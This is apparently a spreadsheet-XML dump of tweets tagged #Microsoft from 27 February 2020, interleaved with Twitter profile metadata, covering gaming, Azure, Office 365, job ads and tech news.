    <t>{'id': 374666593, 'id_str': '374666593', 'name': 'Randy Matusky', 'screen_name': 'Randy_Matusky', 'location': 'Washington, DC', 'description': 'Organizational Development Consultant / Learning &amp; Development Specialist ðŸ‡¨ðŸ‡¦ðŸ‡ºðŸ‡¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5559, 'friends_count': 5312, 'listed_count': 477, 'created_at': 'Fri Sep 16 18:23:45 +0000 2011', 'favourites_count': 9925, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13505,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'http://pbs.twimg.com/profile_images/1138057606793191424/yGhPaNL1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138057606793191424/yGhPaNL1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/374666593/1576201248',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</si>
  <si>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Feb 27 14:18:02 +0000 2020</t>
  </si>
  <si>
    <t>Interesting point of view. Although I agree that people want accessibility to their music and video in all kinds of devices, not sure #Xbox is one of those devices. 
#gaming #Microsoft #PlayStation 
https://t.co/vqQEUEr7Zq https://t.co/BLYoKfvKZG</t>
  </si>
  <si>
    <t>{'id': 35435700, 'id_str': '35435700', 'name': 'Addo', 'screen_name': 'Addob0t', 'location': 'NYC | Toronto | SF', 'description': 'CEO, Co-Founder of @HelloSource an interoperable data management layer for the decentralized web. \n#blockchain #crypto #web3', 'url': 'https://t.co/Hf08MXcCrN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hf08MXcCrN', 'expanded_url': 'http://www.source.network', 'display_url': 'source.network', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 232, 'friends_count': 290, 'listed_count': 39, 'created_at': 'Sun Apr 26 09:14:59 +0000 2009', 'favourites_count': 1384, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4615,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'http://pbs.twimg.com/profile_images/958527707633111041/3vs7RNNl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958527707633111041/3vs7RNNl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35435700/1517366140',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</si>
  <si>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14:17:50 +0000 2020</t>
  </si>
  <si>
    <t>The game supports  n touch inputs.
#WilliamDevereux (@MasterDevwi) says the new #Surf game is far advanced, better n sophisticated in comparison w/ #Chrome's T-Rex game. Plus, it's another reason to switch to #Edge.
#TechGalena #TechNews #Tech #technology #Microsoft #Game https://t.co/gXlFCpfe8H</t>
  </si>
  <si>
    <t>{'id': 921241732808921088, 'id_str': '921241732808921088', 'name': 'TechGalena', 'screen_name': 'techgalena', 'location': 'Mumbai, India', 'description': 'TechGalena (Formerly TechyRadar) keeps you updated with latest Tech Trends.\n\nFollow Us on :- https://t.co/y3RHhEdIfU', 'url': 'https://t.co/Ekr8erNlrK', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ekr8erNlrK', 'expanded_url': 'https://www.youtube.com/TechGalena', 'display_url': 'youtube.com/TechGalena', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/y3RHhEdIfU', 'expanded_url': 'http://instagram.com/TechGalena', 'display_url': 'instagram.com/TechGalena', 'indices': [93, 116]}]}}, 'protected': False, 'followers_count': 190, 'friends_count': 130, 'listed_count': 7, 'created_at': 'Fri Oct 20 05:08:39 +0000 2017', 'favourites_count': 1897, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2712, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231084008504610816/hzU0t2S__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231084008504610816/hzU0t2S__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/921241732808921088/1550562285',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</si>
  <si>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14:16:24 +0000 2020</t>
  </si>
  <si>
    <t>Students in Digital Applications are prepping for Microsoft Word 2019 industry certifications.  #realworldready #DLDay #Certiport #Microsoft #BCBeBrave https://t.co/fzPWNVTUYt</t>
  </si>
  <si>
    <t>{'id': 1106553024070254593, 'id_str': '1106553024070254593', 'name': 'BravesBCHS', 'screen_name': 'BravesBCHS', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 158, 'friends_count': 24, 'listed_count': 1, 'created_at': 'Fri Mar 15 13:49:34 +0000 2019', 'favourites_count': 253, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 262, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161724098923368448/BhqW-DwR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161724098923368448/BhqW-DwR_normal.png',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</si>
  <si>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14:16:08 +0000 2020</t>
  </si>
  <si>
    <t>#techfect20
Because knowledge has beginning but no ending... 
#tech #technology #Tech4All #techno #technews #tech4wildlife #TechTrends #Microsoft @Microsoft @MicrosoftEDU https://t.co/3Dda7rITGk</t>
  </si>
  <si>
    <t>{'id': 1215956254687932416, 'id_str': '1215956254687932416', 'name': 'techfact20', 'screen_name': 'techfact20', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 3, 'listed_count': 1, 'created_at': 'Sat Jan 11 11:19:09 +0000 2020', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 143, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1215956455385452544/Zc_9WUcY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215956455385452544/Zc_9WUcY_normal.jpg',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</si>
  <si>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14:15:21 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 14:14:32 +0000 2020</t>
  </si>
  <si>
    <t>At #Storyals, we continuously update our videos to keep up with the constantly changing #Microsoft applications. This week's featured #tutorial is all about how to use #Outlook across your devices. Take a look at our updated Quick overview and get a glimpse of what you will learn https://t.co/meZWafx8a5</t>
  </si>
  <si>
    <t>{'id': 806952779591938048, 'id_str': '806952779591938048', 'name': 'Storyals', 'screen_name': 'storyals_', 'location': 'Dubai, United Arab Emirates', 'description': 'Storyals is all about helping companies adopt a modern digital workplace and getting more out of their Office 365 investment through our story-based tutorials.', 'url': 'https://t.co/jnCcWkWWXz', 'entities': {'url': {'urls': [{'url': 'https://t.co/jnCcWkWWXz', 'expanded_url': 'https://storyals.com/', 'display_url': 'storyals.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 91, 'listed_count': 2, 'created_at': 'Thu Dec 08 20:05:09 +0000 2016', 'favourites_count': 346, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 551,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'http://pbs.twimg.com/profile_images/1130764664206442496/u4qwRvFm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130764664206442496/u4qwRvFm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/806952779591938048/1516717664', 'profile_link_color': 'F8971D',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</si>
  <si>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14:13:20 +0000 2020</t>
  </si>
  <si>
    <t>Twins looking good  #mustang #hoonigan #kenblock #carculture #NASCAR #drift #forza #forzahorizon4 #ingamephotagraphy #Microsoft #photoshoot #underrated https://t.co/7avanOazcL</t>
  </si>
  <si>
    <t>{'id': 1181374113056722944, 'id_str': '1181374113056722944', 'name': 'Sergio Balderrama', 'screen_name': 'SergioBalderr14', 'location': '', 'description': 'in game photagraphy because Itâ€™s the only thing Iâ€™m good at', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 71, 'listed_count': 0, 'created_at': 'Tue Oct 08 01:02:01 +0000 2019', 'favourites_count': 1693, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 57, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225110089796923392/BbmzjgPB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225110089796923392/BbmzjgPB_normal.jpg',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</si>
  <si>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14:12:25 +0000 2020</t>
  </si>
  <si>
    <t>How to make and receive calls on your PC with the Your Phone app https://t.co/U8pAbdjNtF #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 14:12:03 +0000 2020</t>
  </si>
  <si>
    <t>As seen in the animation below, you do not need to fold up the phone completely to keep track of notifications sent to the phone, it is enough to glance at the lid to see these.  #foldable #foldablephone #leak #leaked #microsoft #phone #phones #surface #s https://t.co/gmjIiDQM4X https://t.co/6nW2IeUTnA</t>
  </si>
  <si>
    <t>{'id': 1222881675979431937, 'id_str': '1222881675979431937', 'name': 'techcravers', 'screen_name': 'techcravers', 'location': '', 'description': 'News and trivia about the world of tech, gadgets and games.', 'url': 'https://t.co/S8QNSNdmfZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/S8QNSNdmfZ', 'expanded_url': 'http://techcravers.net', 'display_url': 'techcravers.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 17, 'listed_count': 2, 'created_at': 'Thu Jan 30 13:58:11 +0000 2020', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 102, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222881733470638081/mgwlkm0P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222881733470638081/mgwlkm0P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1222881675979431937/1580996983',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</si>
  <si>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14:11:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is up and down, they're totally different than when they originally got into the gaming industry, apps, and streaming is winning now for #Microsoft, now they're wannabe gamers.
#Gaming #PS5</t>
  </si>
  <si>
    <t>Thu Feb 27 14:11:39 +0000 2020</t>
  </si>
  <si>
    <t>How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. #Microsoft #Azure secures your data from exploitation with built-in protections. https://t.co/Vqb0PH8IRq</t>
  </si>
  <si>
    <t>Thu Feb 27 14:10:04 +0000 2020</t>
  </si>
  <si>
    <t>If you're looking for work in #Plano, TX, check out this #Microsoft job via the link in our bio: Senior Application Architect ( NET Web) at Heartland</t>
  </si>
  <si>
    <t>{'id': 24119773, 'id_str': '24119773', 'name': 'TMJ-DFW IT-.NET Jobs', 'screen_name': 'tmj_dfw_itdnet', 'location': 'DFW, Texas', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in DFW, Texas. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/i2b9wVCnrL', 'entities': {'url': {'urls': [{'url': 'https://t.co/i2b9wVCnrL', 'expanded_url': 'http://bit.ly/2Lnf33H', 'display_url': 'bit.ly/2Lnf33H', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 245, 'friends_count': 165, 'listed_count': 13, 'created_at': 'Fri Mar 13 03:34:42 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 35,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'http://pbs.twimg.com/profile_images/681973464144543744/gFzwTOdE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/681973464144543744/gFzwTOdE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24119773/1451430120',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</si>
  <si>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Thu Feb 27 14:08:14 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Stratodesk and Citrix make the future of end-user computing better: " https://t.co/4rulwBwiBq
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Thu Feb 27 14:07:34 +0000 2020</t>
  </si>
  <si>
    <t>Received some nice wall art from @microsoftnl, thanks!
#microsoft #azure #swag https://t.co/m90YICng3A</t>
  </si>
  <si>
    <t>Thu Feb 27 14:06:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Brings Defender Antivirus for Linux, Coming Soon for Android and iOS https://t.co/sR6oO3LU2E
#linux #Android #iPhone #Apple #Microsoft #Windows #Google #samsung #Google #technology #technews</t>
  </si>
  <si>
    <t>{'id': 885827704775467009, 'id_str': '885827704775467009', 'name': 'k', 'screen_name': 'milanplus1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Fri Jul 14 11:45:57 +0000 2017', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 175, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1118245429622312960/6IMkWgCZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118245429622312960/6IMkWgCZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/885827704775467009/1555445535',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</si>
  <si>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14:05:38 +0000 2020</t>
  </si>
  <si>
    <t>#wtf ..... #microsoft you are just nuts https://t.co/Iszmnqyxvv</t>
  </si>
  <si>
    <t>{'id': 21178183, 'id_str': '21178183', 'name': 'Lindworm', 'screen_name': 'lindworm', 'location': 'Berlin', 'description': 'Ein ganz normaler VerrÃ¼ckter - - https://t.co/JWG3zTwsSU', 'url': 'https://t.co/mojGtiFq00', 'entities': {'url': {'urls': [{'url': 'https://t.co/mojGtiFq00', 'expanded_url': 'https://mircoblitz.de', 'display_url': 'mircoblitz.de', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JWG3zTwsSU', 'expanded_url': 'http://sendungsbewusstsein.info', 'display_url': 'sendungsbewusstsein.info', 'indices': [33, 56]}]}}, 'protected': False, 'followers_count': 1303, 'friends_count': 595, 'listed_count': 63, 'created_at': 'Wed Feb 18 07:58:42 +0000 2009', 'favourites_count': 2446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25879,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'http://pbs.twimg.com/profile_images/607206641415692288/E572Flwx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/607206641415692288/E572Flwx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21178183/1430589373',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</si>
  <si>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Feb 27 14:05:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts latest #AIforGood cohort aims to make the world a better place https://t.co/IWQ4iwp0EU</t>
  </si>
  <si>
    <t>Thu Feb 27 14:04:47 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft Engineer Used Bitcoin to Help Embezzle Millions From Tech Giant - #BitcoinMixers #Crime #IRS #PolicyRegulation - https://t.co/3xPeqFsm3B</t>
  </si>
  <si>
    <t>{'id': 126159663, 'id_str': '126159663', 'name': 'PaulCrypto.com', 'screen_name': 'PaulESamson', 'location': 'Bathurst, New Brunswick, Canada', 'description': '2020', 'url': 'https://t.co/LOLBhbUtQd', 'entities': {'url': {'urls': [{'url': 'https://t.co/LOLBhbUtQd', 'expanded_url': 'http://www.PaulCrypto.com', 'display_url': 'PaulCrypto.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4449, 'friends_count': 4143, 'listed_count': 10, 'created_at': 'Thu Mar 25 00:55:52 +0000 2010', 'favourites_count': 887, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 57992,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'http://pbs.twimg.com/profile_images/907730917/_cid_200901021358_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907730917/_cid_200901021358_normal.jpg', 'profile_link_color': '981CEB',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</si>
  <si>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Feb 27 14:04:02 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/YBDWYOAW3O</t>
  </si>
  <si>
    <t>{'id': 3937914677, 'id_str': '3937914677', 'name': 'TechNative', 'screen_name': 'TechNative', 'location': 'Earth', 'description': 'Technology at Work â€¢ #EnterpriseIT â€¢ #AI â€¢ #BigData â€¢ #IoT â€¢ #IIoT #InfoSec â€¢ Videos: #TechNativeTV â€¢ LinkedIn: https://t.co/M28Hx1soMh', 'url': 'https://t.co/uOIdDajS6S', 'entities': {'url': {'urls': [{'url': 'https://t.co/uOIdDajS6S', 'expanded_url': 'http://technative.io', 'display_url': 'technative.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/M28Hx1soMh', 'expanded_url': 'https://www.linkedin.com/company/technative', 'display_url': 'linkedin.com/company/technaâ€¦', 'indices': [112, 135]}]}}, 'protected': False, 'followers_count': 84270, 'friends_count': 66035, 'listed_count': 2725, 'created_at': 'Mon Oct 12 14:42:00 +0000 2015', 'favourites_count': 4869, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 62272, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '212349', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3937914677/1526603737',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</si>
  <si>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14:03:31 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Former Software Engineer At Microsoft Convicted Of 18 Federal Felonies | Cryptoknowmics
Watch Full Video  https://t.co/4HU8dEBuSA
#Coinbase #ripple #moneygram #tron #bearish #bitcoin #bitcoinCash #dubai #cbdc #microsoft #warrenBuffett #SoftwareEngineer #Cryptokitties #ufc</t>
  </si>
  <si>
    <t>{'id': 1126431243292139521, 'id_str': '1126431243292139521', 'name': 'Cryptoknowmics', 'screen_name': 'official_ckm', 'location': 'London, United Kingdom', 'description': 'Cryptoknowmics was established in 2019 to provide crypto community with decentralized media portal that can keep a close eye on various aspects of crypto world', 'url': 'https://t.co/G8m1SkPhVW', 'entities': {'url': {'urls': [{'url': 'https://t.co/G8m1SkPhVW', 'expanded_url': 'http://cryptoknowmics.com', 'display_url': 'cryptoknowmics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9424, 'friends_count': 138, 'listed_count': 8, 'created_at': 'Thu May 09 10:18:31 +0000 2019', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1699, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1184350016942399488/VL63GzOT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184350016942399488/VL63GzOT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126431243292139521/1557397370',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</si>
  <si>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14:03:25 +0000 2020</t>
  </si>
  <si>
    <t>To receive updates from NetOne Technologies on our infrastructure modernization solutions and #Microsoft #Azure services, subscribe now! https://t.co/NEfYp6IVCR</t>
  </si>
  <si>
    <t>Thu Feb 27 14:03:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releases the ISO file of #20H1 update   https://t.co/FA3hLJh6Nf by @anmol_112</t>
  </si>
  <si>
    <t>Thu Feb 27 14:02:40 +0000 2020</t>
  </si>
  <si>
    <t>You've got Office 365 in place - what's next? Discover how to Maximise Productivity with Office 365 by watching a recording of our webinar: https://t.co/PpNFct3E4W
#Office365 #Microsoft #Productivity</t>
  </si>
  <si>
    <t>Thu Feb 27 14:02:28 +0000 2020</t>
  </si>
  <si>
    <t>Changes to the Asia locations for the #HPE  #Microsoft #HybridCloud Summit due to the Coronavirus. Check out the updated worldwide schedule.  No change to March 24 Boston stop.  #USEnterpriseEast  #HPEMSFT 
https://t.co/qNgfjOTDn0 https://t.co/jDmYLgs7QE</t>
  </si>
  <si>
    <t>Thu Feb 27 14:00:41 +0000 2020</t>
  </si>
  <si>
    <t>The security tech specialist @FEITIAN_Tech announced support for fingerprint biometric passwordless solutions for @Microsofts #AzureAD. 
#biometrics #FingerprintRecognition #FingerprintBiometrics #FIDO2 #Microsoft #MicrosoftAzure #BiometricSecurity
https://t.co/on3SUiBgJw</t>
  </si>
  <si>
    <t>{'id': 77312459, 'id_str': '77312459', 'name': 'FindBiometrics', 'screen_name': 'FindBiometrics', 'location': 'Toronto,  Canada', 'description': '#1 Biometrics News Resource for Critical Analysis, Breaking News, Exclusive Features, In Depth Interviews, Vertical Reach, Reports, #Biometric Events &amp; More', 'url': 'http://t.co/KMsQE5RRg0', 'entities': {'url': {'urls': [{'url': 'http://t.co/KMsQE5RRg0', 'expanded_url': 'http://www.findbiometrics.com', 'display_url': 'findbiometrics.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8521, 'friends_count': 874, 'listed_count': 313, 'created_at': 'Fri Sep 25 21:13:40 +0000 2009', 'favourites_count': 732, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19868,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'http://pbs.twimg.com/profile_images/506901227750170624/UMPgwsHS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/506901227750170624/UMPgwsHS_normal.png', 'profile_link_color': 'F15432',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</si>
  <si>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14:00:40 +0000 2020</t>
  </si>
  <si>
    <t>Have you updated to the latest version of your browser - Google Chrome 80? Here's something you might want to know: https://t.co/9Hx2vu1sFE
#MGRparty #google #microsoft #browser #technews https://t.co/zpRXpUXHYP</t>
  </si>
  <si>
    <t>{'id': 473352661, 'id_str': '473352661', 'name': 'MGRpartyTampa', 'screen_name': 'MGRpartyTampa', 'location': 'Tampa, Florida', 'description': 'Mobile Gaming Revolution brings you portable video gaming lounges and entertainment theaters for birthday parties, corporate events, sporting events and more.', 'url': 'https://t.co/Az0Y72TiVE', 'entities': {'url': {'urls': [{'url': 'https://t.co/Az0Y72TiVE', 'expanded_url': 'http://MGRparty.com', 'display_url': 'MGRparty.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 871, 'friends_count': 136, 'listed_count': 13, 'created_at': 'Tue Jan 24 21:59:52 +0000 2012', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2673,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'http://pbs.twimg.com/profile_images/1778899739/mobile-gaming-revolution_reasonably_small_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1778899739/mobile-gaming-revolution_reasonably_small_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/473352661/1506834496',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</si>
  <si>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14:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Burst 4K encoding on Azure #Kubernetes Service https://t.co/kPwcSxhE3e #Azure #Microsoft #VirtualMachines #Networking #Containers</t>
  </si>
  <si>
    <t>Thu Feb 27 14:00:24 +0000 2020</t>
  </si>
  <si>
    <t>Interview Microsoft // #NEXCON initiator Thomas Rohrbach &amp;amp;  Microsoft keynote #speaker Sebastian Seutter answer questions about the importance of #VirtualEvents &amp;amp; #Industry40. 
Full Interview: https://t.co/N9JJrIoadu
#Microsoft #SmartFactory #SmartManufacturing #Knowledge https://t.co/TGTHyjLcRo</t>
  </si>
  <si>
    <t>{'id': 1063439176048287750, 'id_str': '1063439176048287750', 'name': 'NEXCON', 'screen_name': 'virtual_NEXCON', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 21, 'listed_count': 2, 'created_at': 'Fri Nov 16 14:30:32 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 99, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173881604214857728/kC-u2mC5_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173881604214857728/kC-u2mC5_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1063439176048287750/1581079294',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</si>
  <si>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14:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Azure #Sphere secure #IoT is now GA ! #Microsoft #Linux Galen Hunt https://t.co/iIjhLtyTnv #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Feb 27 14:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X Quick Resume Still Works After a Reboot https://t.co/CWIxIJ38WB #Interviews #Microsoft #NextGen</t>
  </si>
  <si>
    <t>Thu Feb 27 13:56:27 +0000 2020</t>
  </si>
  <si>
    <t>@IMCloud_UK - Dynamics 365 Business Central 2020 Release Wave 1 video coming soon to my @LinkedIn!! 
@MSFTDynamics365 enhancements really are incredible!! 
#BusinessCentral #Dynamics365 #Microsoft #MicrosoftAdvocate #Dynamics #Office365 #Azure #BetterTogether #IngramMicroCloud https://t.co/4PguBNXMaG</t>
  </si>
  <si>
    <t>Thu Feb 27 13:55:02 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 707316591453724673, 'id_str': '707316591453724673', 'name': 'instant.com.pk', 'screen_name': 'InstantNewsPk', 'location': 'Pakistan', 'description': 'https://t.co/WJLVnHf1zq is the all in one #1 News Network that gives you real-time World-Wide News in single every minute.', 'url': 'https://t.co/U5FfIFDcl4', 'entities': {'url': {'urls': [{'url': 'https://t.co/U5FfIFDcl4', 'expanded_url': 'https://instant.com.pk', 'display_url': 'instant.com.pk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WJLVnHf1zq', 'expanded_url': 'http://Instant.com.pk', 'display_url': 'Instant.com.pk', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 292, 'friends_count': 54, 'listed_count': 4, 'created_at': 'Tue Mar 08 21:26:31 +0000 2016', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 143261,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'http://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/707316591453724673/1582185019',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</si>
  <si>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13:53:59 +0000 2020</t>
  </si>
  <si>
    <t>Unfortunately, Mac OS Catalina is the new Windows Vista. Today it asked if I wanted a writing app to have access to my Documents folder. #Apple, I think it's time to rethink your security warnings. Remember when you made fun of #Microsoft for this?</t>
  </si>
  <si>
    <t>{'id': 586760936, 'id_str': '586760936', 'name': 'Chris Meyers', 'screen_name': 'chrislmeyers', 'location': 'Kansas City area', 'description': '#Author, #writer, software developer, gardener, Linux user, #Christian, former #teacher. Legends of Aeo #fantasy series. DM on invite.', 'url': 'http://t.co/83qUWmP6LD', 'entities': {'url': {'urls': [{'url': 'http://t.co/83qUWmP6LD', 'expanded_url': 'http://www.chrislmeyers.com', 'display_url': 'chrislmeyers.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 735, 'friends_count': 792, 'listed_count': 6, 'created_at': 'Mon May 21 18:32:12 +0000 2012', 'favourites_count': 616, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 417,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'http://pbs.twimg.com/profile_images/993487369343913986/QpUnxy6W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/993487369343913986/QpUnxy6W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/586760936/1485017384',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</si>
  <si>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13:52:10 +0000 2020</t>
  </si>
  <si>
    <t>Google Cloud Puts Amazon and Microsoft on Notice
Google $GOOGL wants to close the gap with Amazon $AMZN and Microsoft $MSFT in the cloud computing market.
#google #amazon #microsoft #cloud
https://t.co/fs5HgOdXdQ https://t.co/yBjCyLZdp2</t>
  </si>
  <si>
